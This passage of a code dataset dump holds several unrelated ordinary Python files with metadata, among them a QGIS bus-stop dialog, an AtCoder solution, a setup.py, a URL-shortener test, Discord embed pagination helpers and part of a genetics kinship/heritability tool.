self.offset.setText(str(self.info[\"offset\"]))\n self.busCapacity.setText(str(self.info[\"busCapacity\"]))\n self.busstopNo.setText(str(self.info[\"busstopno\"]))\n if self.info[\"isTerminal\"] == \"true\" or self.info[\"isTerminal\"] == \"True\":\n self.isTerminal.setCheckState(QtCore.Qt.Checked)\n if self.info[\"isBay\"] == \"true\" or self.info[\"isBay\"] == \"True\":\n self.isBay.setCheckState(QtCore.Qt.Checked) \n if self.info[\"hasShelter\"] == \"true\" or self.info[\"hasShelter\"] == \"True\":\n self.hasShelter.setCheckState(QtCore.Qt.Checked) \n else:\n self.actionButton.setText(\"ADD\")\n QtCore.QObject.connect(self.actionButton, QtCore.SIGNAL('clicked(bool)'), self.update)\n\n def update(self):\n global original_id\n self.errorMessage.setText(\"\")\n self.info = {}\n busstopList = []\n\n # geom = f.geometry()\n # print geom.asPoint()\n # QgsPoint\n # self.info[\"segmentId\"]\n\n\n\n id = self.id.text()\n if id.isdigit() is False:\n self.errorMessage.setText(\"id is invalid. It must be a number.\")\n return\n\n\n if len(id) > 5 :\n self.errorMessage.setText(\"BusStopId is beyond range. Enter a shorter BusStopID.\")\n return\n\n layerfi = iface.activeLayer().dataProvider().dataSourceUri()\n (myDirectory,nameFile) = os.path.split(layerfi)\n tree = ElementTree.parse(myDirectory + '/data.xml')\n root = tree.getroot()\n\n for BusStop in root.iter('BusStop'):\n busstopid = BusStop.find('id').text\n busstopList.append(busstopid)\n\n if id in busstopList and id != original_id:\n self.errorMessage.setText(\"BusStop ID exists. Please enter another ID.\")\n return\n\n self.info[\"id\"] = int(id)\n busstopList.append(id)\n\n offset = self.offset.text()\n if offset.isdigit() is False:\n self.errorMessage.setText(\"offset is invalid. It must be a number.\")\n return\n self.info[\"offset\"] = int(offset)\n\n busCapacity = self.busCapacity.text()\n if busCapacity.isdigit() is False:\n self.errorMessage.setText(\"BusCapacity is invalid. 
It must be a number.\")\n return\n self.info[\"busCapacity\"] = int(busCapacity) \n\n busstopno = self.busstopNo.text()\n if busstopno.isdigit() is False:\n self.errorMessage.setText(\"Busstop No is invalid. It must be a number.\")\n return\n self.info[\"busstopno\"] = int(busstopno)\n\n if self.isTerminal.isChecked():\n self.info[\"isTerminal\"] = \"true\"\n else:\n self.info[\"isTerminal\"] = \"false\" \n if self.isBay.isChecked():\n self.info[\"isBay\"] = \"true\"\n else:\n self.info[\"isBay\"] = \"false\" \n if self.hasShelter.isChecked():\n self.info[\"hasShelter\"] = \"true\"\n else:\n self.info[\"hasShelter\"] = \"false\" \n\n self.info[\"segmentId\"] = int(self.segmentId.text())\n\n self.isModified = True\n self.accept()", "sub_path": "editor/busstop_dialog.py", "file_name": "busstop_dialog.py", "file_ext": "py", "file_size_in_byte": 5455, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PyQt4.QtGui.QDialog", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 31, "usage_type": "name"}, {"api_name": "ui_busstop.Ui_Busstop", "line_number": 31, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialog.__init__", "line_number": 35, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QDialog", "line_number": 35, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 61, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 61, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 63, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 63, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 65, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QObject.connect", "line_number": 68, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QObject", "line_number": 68, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 68, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 95, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 95, "usage_type": "name"}]} +{"seq_id": "585908852", "text": "# https://atcoder.jp/contests/abc005/tasks/abc005_4\nimport sys\nsys.setrecursionlimit(2147483647)\nINF=float(\"inf\")\nMOD=10**9+7\ninput=lambda:sys.stdin.readline().rstrip()\nclass cumsum2d(object):\n def __init__(self,m,n):\n self.__m=m\n self.__n=n\n self.__S=[[0]*(n+1) for _ in range(m+1)]\n\n def __repr__(self):\n return '\\n'.join(' '.join(map(str,s)) for s in self.__S)\n\n def add(self,i,j,w):\n self.__S[i+1][j+1]+=w\n\n def cumulate(self):\n S=self.__S\n for i in range(self.__m):\n for j in range(self.__n):\n S[i+1][j+1]+=S[i+1][j]+S[i][j+1]-S[i][j]\n\n def sum(self,i0,i1,j0,j1):\n S=self.__S\n return S[i1][j1]-S[i0][j1]-S[i1][j0]+S[i0][j0]\n\ndef resolve():\n n=int(input())\n C=cumsum2d(n,n)\n for i in range(n):\n for j,d in enumerate(map(int,input().split())):\n C.add(i,j,d)\n C.cumulate()\n\n score=[-INF]*(n**2+1)\n from itertools import product\n for di,dj in product(range(1,n+1),repeat=2):\n for i,j in product(range(n-di+1),range(n-dj+1)):\n 
score[di*dj]=max(score[di*dj],C.sum(i,i+di,j,j+dj))\n for i in range(n**2):\n score[i+1]=max(score[i+1],score[i])\n\n for _ in range(int(input())):\n print(score[int(input())])\nresolve()\n", "sub_path": "ABC005/d_おいしいたこ焼きの焼き方.py", "file_name": "d_おいしいたこ焼きの焼き方.py", "file_ext": "py", "file_size_in_byte": 1290, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.setrecursionlimit", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.stdin.readline", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 6, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 39, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "103610086", "text": "# Checking python version: If python 3 was not found then it returns 1 and does\n# not do anything\nfrom platform import python_version\nprimer_version = python_version().split(\".\")\nif int(primer_version[0]) != 3:\n print (\"This module only works with python3\")\n print (\"To setup the module simply run `python3 setup.py install`\")\n exit(1)\n\n\n# Checking the version of python interpreter. This code only works with python3.\nimport sys\nif sys.version_info < (3,5):\n sys.exit('Python < 3.5 is not supported')\n\n\n#from distutils.core import setup, Extension\nfrom setuptools import setup, Extension\nimport os\nimport numpy\n\n\n# Utility function to read the README file.\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nextension_mod = Extension(\"lilcom.lilcom_c_extension\",\n sources=[\"lilcom/lilcom_c_extension.c\",\"lilcom/lilcom.c\"],\n extra_compile_args=[\"-DNDEBUG\"],\n #extra_compile_args=[\"-g\"],\n include_dirs=[numpy.get_include()])\n\nsetup(\n name = \"lilcom\",\n python_requires='>=3.5',\n version = \"0.0.0\",\n author = \"Daniel Povey, Soroush Zargar, Mahsa Yarmohammadi\",\n author_email = \"dpovey@gmail.com\",\n description = (\"Small compression utility for sequence data in NumPy\"),\n license = \"BSD\",\n keywords = \"compression numpy\",\n packages=['lilcom'],\n url = \"http://packages.python.org/an_example_pypi_project\",\n ext_modules=[extension_mod],\n long_description=read('README.md'),\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Topic :: Utilities\",\n \"License :: OSI Approved :: BSD License\",\n ],\n)\n\nexit(0)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1722, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "platform.python_version", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 25, "usage_type": "call"}, {"api_name": "setuptools.Extension", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.get_include", "line_number": 31, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "417348233", "text": "import pandas as pd \r\nimport numpy as np \r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom ComputeL2Cost import computeL2Cost\r\nfrom ComputeGradient 
import computeGradient\r\nfrom GradientDescent import gradientDescent\r\n\r\n# Reading and loading X and y\r\ndataset = pd.read_excel(\"C://Users//Ratan Singh//Desktop//ML Training Code//LinearRegression//cancer_reg.xlsx\")\r\nn = dataset.shape[1] - 1\r\nX = np.array(dataset.iloc[:,0:4])\r\ny = np.array(dataset.iloc[:,4])\r\n\r\nX_train, X_test, Y_train, Y_test = train_test_split(X,y,test_size = 0.3)\r\n\r\n\r\n# Defining parameters for gradient descent\r\n\r\ninitialWeights = np.random.random([1,X.shape[1]])\r\nmaxIter = 100\r\nlearningRate = 0.1\r\n\r\n\r\n# Training a Linear Regression\r\n\r\nweights = initialWeights\r\ncost = []\r\n\r\nfor i in range(maxIter):\r\n\r\n\typ = np.matmul(weights, X_train.T).ravel()\r\n\tJ = computeL2Cost(Y_train, yp)\r\n\tG = computeGradient(X_train, Y_train, yp)\r\n\tweights = gradientDescent(weights, G, learningRate)\r\n\r\n\tif i%10 == 0:\r\n\t\tprint(\"Cost of the model is {}\".format(J))\r\n\tcost.append(J)\r\n\r\n\r\nprint(\"Weights after the training are {}\".format(weights))\r\n\r\n\r\n\r\n# Prediction using the model\r\n\r\nyp = np.matmul(weights, X_test.T).ravel()\r\nprint(\"MSE for the fitted model is {}\".format(computeL2Cost(Y_test,yp)))\r\n\r\n\r\n", "sub_path": "Regression/StepwiseRegression/LinearRegression.py", "file_name": "LinearRegression.py", "file_ext": "py", "file_size_in_byte": 1266, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_excel", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 32, "usage_type": "call"}, {"api_name": "ComputeL2Cost.computeL2Cost", "line_number": 33, "usage_type": "call"}, {"api_name": "ComputeGradient.computeGradient", "line_number": 34, "usage_type": "call"}, {"api_name": "GradientDescent.gradientDescent", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 48, "usage_type": "call"}, {"api_name": "ComputeL2Cost.computeL2Cost", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "347731616", "text": "#! 
-*- encoding: utf-8 -*-\n\nfrom sys import argv, exit\n\n\nTHRESHOLD = 3\n\ndef read_file(city_file):\n import yaml\n\n with open(city_file,'r') as f:\n cities = yaml.load(f, Loader=yaml.FullLoader)\n f.close()\n\n return cities\n\ndef handle_city_name(city_name):\n from unidecode import unidecode\n\n handled_city_name = unidecode(city_name.lower().replace(\"'\",''))\n handled_city_name = handled_city_name.replace('-',' ')\n handled_city_name = handled_city_name.replace('_',' ')\n\n return handled_city_name\n\ndef generate_hash_cities(cities, city_name):\n import Levenshtein\n\n city_name = handle_city_name(city_name)\n proximity = {}\n for i in range(THRESHOLD):\n proximity[i] = {}\n\n for key, value in cities.items():\n value_name = handle_city_name(value['nome_municipio'])\n dist = Levenshtein.distance(value_name, city_name)\n\n if (dist < THRESHOLD):\n proximity[dist][value['nome_municipio']] = {'codigo_municipio':value['codigo_municipio'], 'sigla_uf':value['sigla_uf']}\n\n return proximity\n\ndef get_city_code(hash_cities):\n print('Por favor, confirme o nome da cidade e a UF:')\n print('--------------------------------------------')\n count = 0\n answer = {}\n\n if (hash_cities[0] != {}):\n city = list(hash_cities[0].keys())[0]\n print(str(count)+':', city, '-', hash_cities[0][city]['sigla_uf'], '[Enter]')\n print()\n answer[count] = hash_cities[0][city]['codigo_municipio']\n count += 1\n \n cities = list(hash_cities[0].keys())[1:]\n for city in cities:\n print(str(count), '-', city, '-', hash_cities[0][city]['sigla_uf'])\n answer[count] = hash_cities[0][city]['codigo_municipio']\n count += 1\n\n city_proximity = list(hash_cities.keys())[1:]\n for key in city_proximity:\n for city in hash_cities[key].keys():\n print(str(count)+':', city, '-', hash_cities[key][city]['sigla_uf'])\n answer[count] = hash_cities[key][city]['codigo_municipio']\n count += 1\n print('--------------------------------------------')\n print('Insira o número correspondente à opção: ')\n idx_city = input()\n \n if (idx_city != '' and (not idx_city.isdigit() or int(idx_city) not in range(count))):\n print('Opção inválida! 
Tente novamente.')\n\n return get_city_code(hash_cities)\n \n if (idx_city == ''):\n return answer[0]\n elif (idx_city.isdigit()):\n return answer[int(idx_city)]\n else:\n print('Um erro inesperado aconteceu.')\n print('Execução abortada.')\n exit(-1)\n\ndef save_in_file(city_code, tmp_file):\n with open(tmp_file,'w') as f:\n f.write(city_code)\n f.close()\n\ndef main():\n if (len(argv) != 4):\n print('Usage:', argv[0], '', '', '')\n exit(-1)\n\n city_file = argv[1]\n city_name = argv[2]\n tmp_file = argv[3]\n\n cities = read_file(city_file)\n hash_cities = generate_hash_cities(cities, city_name)\n city_code = get_city_code(hash_cities)\n\n save_in_file(city_code, tmp_file)\n return 0\n\nif (__name__ == '__main__'):\n main()\n", "sub_path": "bin/get_city_code.py", "file_name": "get_city_code.py", "file_ext": "py", "file_size_in_byte": 3212, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "yaml.load", "line_number": 12, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 12, "usage_type": "attribute"}, {"api_name": "unidecode.unidecode", "line_number": 20, "usage_type": "call"}, {"api_name": "Levenshtein.distance", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 92, "usage_type": "argument"}, {"api_name": "sys.argv", "line_number": 93, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 94, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 96, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 97, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 98, "usage_type": "name"}]} +{"seq_id": "288050467", "text": "# -*- coding: utf-8 -*-\nfrom rest_framework.test import APITransactionTestCase\n\nfrom tiny_urls.users.models import User\nfrom tiny_urls.urls.models import Url\n\n\nclass TestUrlRedirect(APITransactionTestCase):\n def setUp(self):\n self.user = User.objects.create(email='williandmorais@gmail.com')\n self.url = Url.objects.create(\n user=self.user,\n url='https://www.google.com.br',\n hits=0\n )\n self.client.force_authenticate(self.user)\n\n def test_url_redirect(self):\n response = self.client.get(\n '/urls/{}/'.format(self.url.short_url),\n format='json'\n )\n\n self.assertRedirects(response, 'https://www.google.com.br', status_code=301, fetch_redirect_response=False)\n\n self.url.refresh_from_db()\n self.assertEqual(self.url.hits, 1)\n\n def test_url_redirect_not_found(self):\n response = self.client.get(\n '/urls/invalid/',\n format='json'\n )\n\n self.assertDictEqual(response.json(), {'detail': 'Not found.'})\n self.assertEqual(response.status_code, 404)\n", "sub_path": "tests/test_urls/test_url_redirect.py", "file_name": "test_url_redirect.py", "file_ext": "py", "file_size_in_byte": 1118, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.test.APITransactionTestCase", "line_number": 8, "usage_type": "name"}, {"api_name": "tiny_urls.users.models.User.objects.create", "line_number": 10, "usage_type": "call"}, {"api_name": "tiny_urls.users.models.User.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tiny_urls.users.models.User", "line_number": 10, "usage_type": "name"}, {"api_name": "tiny_urls.urls.models.Url.objects.create", "line_number": 11, "usage_type": "call"}, {"api_name": "tiny_urls.urls.models.Url.objects", "line_number": 11, 
"usage_type": "attribute"}, {"api_name": "tiny_urls.urls.models.Url", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "431004507", "text": "import copy\nimport discord\nimport re\n\n\nMAX_DESC_CAPACITY = 2048\nMAX_FIELD_CAPACITY = 1024\nRE_HANGING_PARAGRAPHS = re.compile(r'\\n(?=\\S)')\n\n\nclass UtilityError(Exception):\n \"\"\"Base class for utility-related exceptions.\"\"\"\n def __init__(self, message):\n self.message = message\n\n\nclass OverlongEmbedComponentError(UtilityError):\n def __init__(self, item):\n super().__init__(\n 'Desired embed component has length %d exceeding %d:\\n%r' % (\n len(item), MAX_FIELD_CAPACITY, item))\n\n\ndef paginated_embed_content(*,\n title,\n content,\n break_re=RE_HANGING_PARAGRAPHS,\n rejoin='\\n',\n **embed_kwargs):\n \"\"\"Generate a list of embeds, resulting from the pagination of CONTENT.\"\"\"\n embed_descs, capacity = [[]], MAX_DESC_CAPACITY\n for fragment in re.split(break_re, content):\n if len(fragment) > MAX_DESC_CAPACITY:\n raise OverlongEmbedComponentError(fragment)\n if len(fragment) < capacity:\n embed_descs[-1].append(fragment)\n capacity -= len(fragment) + 1\n else:\n embed_descs.append([fragment])\n capacity = MAX_DESC_CAPACITY - len(fragment)\n\n if len(embed_descs) == 1:\n return [discord.Embed(title=title,\n description=rejoin.join(embed_descs[0]),\n **embed_kwargs)]\n else:\n return [discord.Embed(title='%s (%d/%d)' % (title, idx, len(embed_descs)),\n description=rejoin.join(fragments),\n **embed_kwargs)\n for idx, fragments in enumerate(embed_descs, start=1)]\n\n\ndef paginated_embed_fields(*,\n fields,\n break_re=RE_HANGING_PARAGRAPHS,\n **embed_kwargs):\n \"\"\"Generate a list of embeds, resulting from the pagination of FIELDS content.\n\n Args:\n fields - A list of `(field_name, field_value)` pairs indicating the desired\n embed content. (Note that `\"\"` is a valid field_name.)\n break_re - A regex object (or a string denoting a regex) used to break\n `field_value`s into smaller pieces for pagination. 
It defaults to\n `r'\\\\n(?=\\\\S)'`, which breaks paragraphs with hanging indentation.\n embed_kwargs - Valid keyword args for `discord.Embed`.\n Returns:\n A list of embeds, containing paginated `field_value` content, with\n `field_name`s rewritten to indicate the number of pages they've been\n broken into.\"\"\"\n\n embed_fields, capacity = [[]], MAX_FIELD_CAPACITY\n # embed_fields is a list of embed contents, where each embed's contents is\n # represented as a list of (field_name, field_value) pairs\n for field_name, field_value in fields:\n field_segments = [[]]\n for field_piece in re.split(break_re, field_value):\n if len(field_piece) > MAX_FIELD_CAPACITY:\n raise OverlongEmbedComponentError(field_piece)\n if len(field_piece) < capacity:\n field_segments[-1].append(field_piece)\n capacity -= (len(field_piece) + 1) # include eventual newline separator\n else:\n # Fit the piece into a new field segment\n field_segments.append([field_piece])\n capacity = MAX_FIELD_CAPACITY - len(field_piece)\n if len(field_segments) == 1:\n embed_fields[-1].append((field_name, '\\n'.join(field_segments[0])))\n else:\n embed_fields[-1].append(('%s (1/%d)' % (field_name, len(field_segments)),\n '\\n'.join(field_segments[0])))\n embed_fields.extend(\n [('%s (%d/%d)' % (field_name, segment_idx + 1, len(field_segments)),\n '\\n'.join(content))]\n for segment_idx, content in enumerate(field_segments[1:], start=1))\n\n embeds = []\n for content in embed_fields:\n new_embed = discord.Embed(**embed_kwargs)\n for name, value in content:\n new_embed.add_field(name=name, value=value, inline=False)\n embeds.append(new_embed)\n return embeds\n", "sub_path": "secretkeeper/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 3972, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.compile", "line_number": 8, "usage_type": "call"}, {"api_name": "re.split", "line_number": 32, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 43, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 47, "usage_type": "call"}, {"api_name": "re.split", "line_number": 76, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "174304343", "text": "# -*- coding: utf-8 -*-\n\n#MIT License\n\n#Copyright (c) 2017 Marton Kelemen\n\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in all \n# copies or substantial portions of the Software.\n\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#SOFTWARE.\n\n\n# Dependencies:\n# numpy\n# scipy\n\n\n\n# https://docs.python.org/3/library/argparse.html\n#https://docs.python.org/3/howto/argparse.html \nimport argparse\nfrom pathlib import Path\n\n\nfrom com.application.logic.knet import knet_manager\nfrom com.application.logic.scanner import scanner\nfrom com.application.utils import plotgen\n\nfrom com.io import knet_IO\nimport os\nimport gc\nimport numpy as np\n\ndef set_Threads(args) : \n if args.threads is not None :\n os.environ['MKL_NUM_THREADS'] = args.threads # '16' # use here N, where N is the number of cores available, or limit to 1\n os.environ['MKL_DYNAMIC'] = 'FALSE'\n os.environ['OMP_NUM_THREADS'] = '1'\n \n print(\"set MKL number of threads to: \" + str(args.threads))\n \n \ndef set_nixMem(args) : \n if args.nixMem is not None :\n import resource # this only exists on Unix/Linux based systems\n rsrc = resource.RLIMIT_AS\n soft, hard = resource.getrlimit(rsrc)\n print('Soft limit starts as :', soft)\n print('Hard limit starts as :', hard)\n \n resource.setrlimit(rsrc, (args.nixMem * 1048576, hard)) #limit\n \n soft, hard = resource.getrlimit(rsrc)\n print('Soft limit changed to :', soft)\n print('Hard limit changed to :', hard)\n\n\ndef rundom(args) :\n set_Threads(args)\n set_nixMem(args) \n print('Knet recoding genotype matrix into dominance contrasts started') \n from com.application.logic.reml import kinship\n import shutil\n \n # load data\n genotypeData = knet_IO.loadPLINK(args.bfile, loadPhenos = False, replaceMissing = True) \n M = genotypeData[\"M\"]\n del genotypeData ; gc.collect() # dont need this\n \n # recode to dominance\n M = kinship.recodeSNPs_to_Dominance(M)\n\n #write it to disk\n knet_IO.writePLINK(args.out,M) \n \n # need to copy the .bim/.fam , as pyplink does not write those...\n shutil.copyfile(args.bfile + \".bim\", args.out +\".bim\")\n shutil.copyfile(args.bfile + \".fam\", args.out +\".fam\")\n print(\"written dominance genotype data to\", args.out)\n\n\n\ndef runmhe(args) :\n set_Threads(args)\n set_nixMem(args) \n print('Knet estimating Variance Components via Multiple Haseman-Elston Regression started') \n from com.application.utils import geno_qc\n # load plink binary (or eigen summary) / phenotypes\n cc = True\n if args.cc == 0 : cc = False\n \n recodecc = True\n if args.recodecc == 0 : recodecc = False # IE if this is FALSE, then we will NOT recode \n \n # load training data\n y = knet_IO.loadPLINKPheno(args.pheno, caseControl = cc, recodeCaseControl = recodecc) \n y = geno_qc.standardise_Genotypes(y)\n\n\n\n from com.application.logic.he import multi_he\n \n # depending on what MHE is requested run that\n if args.res == 0 : multi_he.HE_Multi_external(args, y)\n else : multi_he.HE_Multi_residuals(args, y)\n \n\n \n # concern: shouldn't we 'square' the XX^T BEFORE dividing it by p, 
rather than dividing it by p AFTER squaring it??\n # or would that blow things out of proportion??\n \n \n \n\ndef runkinmerge(args) :\n set_Threads(args)\n set_nixMem(args) \n print('Knet merging Kinships started') \n \n from com.application.logic.reml import kinship\n \n allKinLocations = knet_IO.loadKinshipLocations(args.allkins)\n \n # need to know the number of SNPs that were used for each kinship, so we can weight them according to the total\n kinshipSNPs = list()\n for i in range(len(allKinLocations)) :\n kinshipSNPs.append( knet_IO.load_N_fromGCTA_GRM( allKinLocations[i] ) )\n gc.collect()\n \n totalSNPs = np.sum(kinshipSNPs)\n kinship_total = None\n IDs = None\n print('will load', str(len(allKinLocations)) , \" kinship matrices, with a total of \",str( int(totalSNPs) ), \" SNPs\", flush=True )\n \n for i in range(len(allKinLocations)) :\n K_new = knet_IO.loadGCTA_GRM(allKinLocations[i])\n K = K_new[\"K\"] \n currentSNPs = K_new[\"N\"][0]\n IDs = K_new[\"ids\"]\n weight = currentSNPs/totalSNPs\n del K_new; gc.collect()\n if kinship_total is None : # if this is the first kinship we have loaded\n kinship_total = K * weight\n else :\n kinship_total = kinship_total + K * weight\n \n\n del K; gc.collect()\n print(\"merged kinship\", (i+1) , \" out of:\", len(allKinLocations), \"weighted at:\", weight, flush=True )\n \n knet_IO.writeGCTA_GRM(args.out,kinship_total, IDs, totalSNPs)\n # K_totalLoaded = loadGCTA_GRM('../../../0cluster/results/broadsenseh2/kinship_total')[\"K\"]\n\ndef runcalckins(args) :\n set_Threads(args)\n set_nixMem(args) \n print('Knet calculating Kinship started') \n \n\n from com.application.logic.reml import kinship\n from com.application.utils import geno_qc\n \n # load data\n genotypeData = knet_IO.loadPLINK(args.bfile, loadPhenos = False) \n M = genotypeData[\"M\"]\n irsIds = genotypeData[\"rsid\"] \n IDs = genotypeData[\"IDs\"] \n del genotypeData ; gc.collect() # dont need this\n \n # QC data\n qc_data = geno_qc.genoQC_all(M, rsIds = irsIds)\n M = qc_data[\"X\"]\n rsIds_qc = qc_data[\"rsIds\"] # will need these, as after removing some SNPs, I cannot just apply the LDAK weights, but will need to match them up....\n indicesToRemove = qc_data[\"indicesToRemove\"] # i might actually be able to get away by using this on the LDAK weights\n MAFs = qc_data[\"MAFs\"] # in case this will be needed to apply a score based on it\n del qc_data; del irsIds; gc.collect()\n \n \n # load weights if any\n weights = None\n if args.MAFS : # if MAF Score weights are requested\n print(\"computing MAF scores\", flush=True)\n weights = geno_qc.computeMAFScore(MAFs, args.MAFS)\n \n if args.weights : # load LDAK weights\n LDAK_weights = knet_IO.loadLDAKWeights(args.weights)\n gc.collect()\n print(\"Loaded number of LDAK Weights: \", len(LDAK_weights), flush=True)\n LDAK_weights = np.delete(LDAK_weights, indicesToRemove) # delete any SNPs that were removed by the internal QC process \n print(\"After deleting QCd SNPs(\",len(indicesToRemove),\") remaining weights: \", len(LDAK_weights), flush=True)\n if weights is not None: # if we requested MAF Scores as weights then the total weights will be their product\n weights = weights * LDAK_weights\n else : weights = LDAK_weights # otherwise just use the LDAK weights\n \n # the LDAK weights set some SNPs to 0, which would then cause the z-score to fail (dividing by std dev 0)\n # solution: remove all 0 values from both the weights as well as from the M design matrix\n nonZeroWeightsIndices = np.nonzero(weights)[0] # get all nonzero weight's indices\n M = np.take(M, 
nonZeroWeightsIndices, axis=1) # only keep these for M\n weights = np.take(weights, nonZeroWeightsIndices) # as well as for the weights\n \n if weights is not None : weights = np.diag(weights) # turn it into a diagonal matrix\n \n numSNPs = M.shape[1]\n \n # if a dominance kinship was requested\n if args.dominance :\n print(\"computing dominance kinship\", flush=True)\n # get dominance kinship\n K_dominance = kinship.calc_Kinship_Dominance(M, weights) ## apply weights for LD / MAFs (if any)\n gc.collect()\n # write it to disk then dispose\n knet_IO.writeGCTA_GRM(args.out + \"_dom\",K_dominance, IDs, numSNPs)\n del K_dominance; gc.collect()\n \n # Additive Kinship\n print(\"computing additive kinship\", flush=True)\n if weights is not None: M = M.dot(weights)\n M = geno_qc.standardise_Genotypes(M)\n K_additive = kinship.calc_Kinship(M)\n knet_IO.writeGCTA_GRM(args.out + \"_add\",K_additive, IDs, numSNPs)\n \n# \n# \n# part = M.shape[1] / 4\n# part1 = int( (part *2) )\n# part2 = part1 + int( (part) )\n# part3 = M.shape[1]\n#\n# M1 = M[:,0:part1]\n# M2 = M[:,part1:part2]\n# M3 = M[:,part2:part3]\n# M1.shape[1] + M2.shape[1] + M3.shape[1]\n# \n# \n# K_additive = calc_Kinship(M1)\n# knet_IO.writeGCTA_GRM(args.out + \"_part1\",K_additive, IDs, M1.shape[1])\n# \n# K_additive = calc_Kinship(M2)\n# knet_IO.writeGCTA_GRM(args.out + \"_part2\",K_additive, IDs, M2.shape[1])\n# \n# K_additive = calc_Kinship(M3)\n# knet_IO.writeGCTA_GRM(args.out + \"_part3\",K_additive, IDs, M3.shape[1])\n# \n# \n# del K_additive; gc.collect()\n# \n# del M; del M1; del M2; del M3; del MAFs; del rsIds_qc;\n# gc.collect()\n#\n# K_additive_total = calc_Kinship(M)\n# knet_IO.writeGCTA_GRM(args.out + \"_total\",K_additive_total, IDs, M.shape[1])\n\n \n \ndef runrrblup_big(args) :\n set_Threads(args)\n set_nixMem(args) \n print('Knet RidgeRegression BLUP started') \n \n from com.application.logic.reml import reml\n from com.application.logic.reml import kinship\n from com.application.utils import geno_qc\n # load plink binary (or eigen summary) / phenotypes\n cc = True\n if 